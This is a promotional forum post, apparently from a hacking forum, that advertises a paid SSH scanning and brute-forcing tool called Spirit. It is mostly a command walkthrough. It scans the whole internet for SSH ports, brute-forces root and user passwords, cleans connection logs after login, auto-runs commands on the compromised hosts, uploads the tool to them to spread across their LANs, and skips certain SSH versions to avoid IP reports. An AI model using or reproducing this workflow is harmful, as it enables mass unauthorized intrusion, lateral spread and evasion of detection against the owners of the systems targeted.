SPIRIT IS A BEST NETWORKING SCANNER AND SSH BRUTE FORCING TOOL

[GBLTeam]

Hello, many of you dont know about Spirit this is a 2 year project, and currently best networking scanner available for free and paid choice! For paid one use code "DEFLATE" for 10% off the price
You can also join group: https://t.me/spiritNPT (here you can ask for anyrthing related to Spirit)

https://imgur.com/iS5TdEi

QUICK START:
CSS: Скопировать в буфер обмена

wget https://github.com/theaog/spirit/releases/download/1.30/spirit.tgz
tar xvf spirit.tgz
./spirit --help

sudo apt install masscan
cp `which masscan` .

# automatic random scanning
./spirit autobrute --ports 22

AUTOBRUTE WITH ZONES:
Код: Скопировать в буфер обмена

# Create zone.lst containing IP addresses in CIDR notation
$ cat >zone.lst<< EOF
192.168.0.0/16
172.16.0.0/12
10.0.0.0/8
EOF

# autobrute will generate collision-free(non-repeating) random ports
# scan and brute them over and over -- forever!
./spirit autobrute

Example usage for SSH brute flow TLDR;
Код: Скопировать в буфер обмена

# First scan your network or the internet (check disclaimer) to acquire a list of open ports.
$ masscan \
    --rate="50000" \
    --ports "22,222,2222,2212" 0.0.0.0/0 \
    --exclude 255.255.255.255 \
    -oG open.lst
Scanning 4294967295 hosts [4 ports/host]
# masscan will create an open.lst file in oG (output Greppable) format.

# Parse this open.lst to format the data, so that spirit can understand it.
$ ./spirit parse
INFO created h.lst in HOST:PORT format

# Optional: create a filter.lst file if you want to skip certain SSH versions.
$ cat >filter.lst<< EOF
SSH-1.0
SSH-2.0-CISCO
SSH-2.0-Comware
EOF

# Grab SSH banners to make sure your target version is running on the host. NOTE: Makes a backup of h.lst to h.lst.bak
$ ./spirit banner
INFO backing up h.lst to h.lst.bak
SSH-2.0-OpenSSH_8.2p  13% [=>                  ] [11s:1m15s]
INFO created h.lst in HOST:PORT:BANNER format
head -n1 h.lst
100.100.100.100:2222:SSH-2.0-OpenSSH_6.6.1

# Add a password list, spirit will automatically load user:pass from a p.lst file.
# NOTE: if p.lst is not present, Spirit uses an internal passfile
$ cat > p.lst << EOF
user1:pass1
user1:pass2
user2:pass50
EOF

# Start bruting...
$ ./spirit brute
Spirit NPT (v1.30) upgrade by 24 Mar 24 00:00 UTC
HINT: Use `./spirit zap` to clean connection logs after you login via SSH
rlimit soft [1048576] hard [1048576]
INFO loaded b.lst with 26803 hosts
INFO loaded p.lst with 4881 logins
INFO randomized hosts
INFO block [true]
INFO timeout [5s]
INFO threads [1024]
[2478/4653]root:!1qwerty [77]found [33]blocked [1284]threads 20% [====>               ] [20s:1h13m36s]
Results
 |- found.ssh # Prepared SSH command
 |- found.login # Successful USER:PASS combinations
 |- found.lst # Syntax for autossh tool
 |- found.errors # SSH connection error statistics
Hosts[26803] Bruted[4000] Blocked[19803] Found[3000]

# If you want to go Faster try blocking bad hosts
./spirit brute --block=true

# Connect to all your found hosts automatically & run commands.
$ ./spirit autossh --command 'whoami && uptime'
# Upload spirit to all hosts and scan the LAN
$ ./spirit autossh --upload ./spirit --command '/tmp/spirit scan --lan'

 

[GBLTeam]

TIP:
CSS: Скопировать в буфер обмена

1. Increase your file descriptor limits: ulimit -n 65535
2. Set a proper timeout based on the network latency towards your targets: --timeout 15s
3. Adjust threads according to your network bandwidth and server resources: --threads 1500
4. Disable host blocking on LAN: --block=false
5. Inspect `found.errors` for optimization clues.
6. Use `filter.lst` to skip bad SSH versions that could get your IP reported.

Example Command:
./spirit brute --timeout 15s --threads 1500 --block=false

#NEW feature: ./spirit --tweak — configures your kernel settings w/ optimal values for scanning